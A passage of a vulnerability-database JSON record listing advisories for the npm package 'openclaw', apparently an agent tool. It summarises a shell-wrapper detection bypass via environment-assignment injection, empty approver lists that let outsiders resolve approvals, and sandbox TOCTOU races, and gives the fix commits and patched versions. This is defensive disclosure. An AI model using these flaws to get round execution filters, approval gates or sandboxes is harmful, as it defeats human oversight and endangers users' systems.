},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32302","GHSA-5wcw-8jjv-m286"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2jsx-pvnr-6ydn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89219?format=json","vulnerability_id":"VCID-2khh-wv8p-97ff","summary":"OpenClaw: Shell-wrapper detection missed env-argv assignment injection forms\n## Summary\n\nShell-wrapper detection missed env-argv assignment injection forms.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.22 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nExec preflight handling missed shell-wrapper and argv-level environment assignment forms that could affect execution semantics, including high-risk shell environment controls.\n\n## Technical Details\n\nThe fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy.\n\n## Fix\n\nThe issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab`\n- PR: #65717\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42435","reference_id":"","reference_type":"","scores":[{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.28675","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31188","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42435"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65717","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65717"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42435","reference_id":"CVE-2026-42435","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42435"},{"reference_url":"https://github.com/advisories/GHSA-j6c7-3h5x-99g9","reference_id":"GHSA-j6c7-3h5x-99g9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j6c7-3h5x-99g9"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection","reference_id":"openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-42435","GHSA-j6c7-3h5x-99g9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2khh-wv8p-97ff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89236?format=json","vulnerability_id":"VCID-2mxq-krq5-bycx","summary":"OpenClaw: Empty approver lists could grant explicit approval authorization\n## Summary\n\nEmpty approver lists could grant explicit approval authorization.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nFor helper-backed channels, an empty resolved approver list could be interpreted as explicit approval authorization, allowing a sender outside the normal channel authorization gate to resolve pending approvals if they knew an approval id.\n\n## Technical Details\n\nThe fix prevents empty approver lists from granting explicit approval authorization and adds regression coverage for unauthorized senders.\n\n## Fix\n\nThe issue was fixed in #65714. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `0a105c0900de701d2ee9f1abc96b017afbd0afdd`\n- PR: #65714\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43574","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09702","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11327","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11359","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43574"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65714","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65714"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43574","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43574"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists"},{"reference_url":"https://github.com/advisories/GHSA-49cg-279w-m73x","reference_id":"GHSA-49cg-279w-m73x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-49cg-279w-m73x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-43574","GHSA-49cg-279w-m73x"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2mxq-krq5-bycx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89509?format=json","vulnerability_id":"VCID-2uqu-k42d-1baq","summary":"OpenClaw: Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n## Summary\nSandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `32a4a47d602e0618f87b3e59f94d8c142767f860` — 2026-03-30T16:49:49+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860"},{"reference_url":"https://github.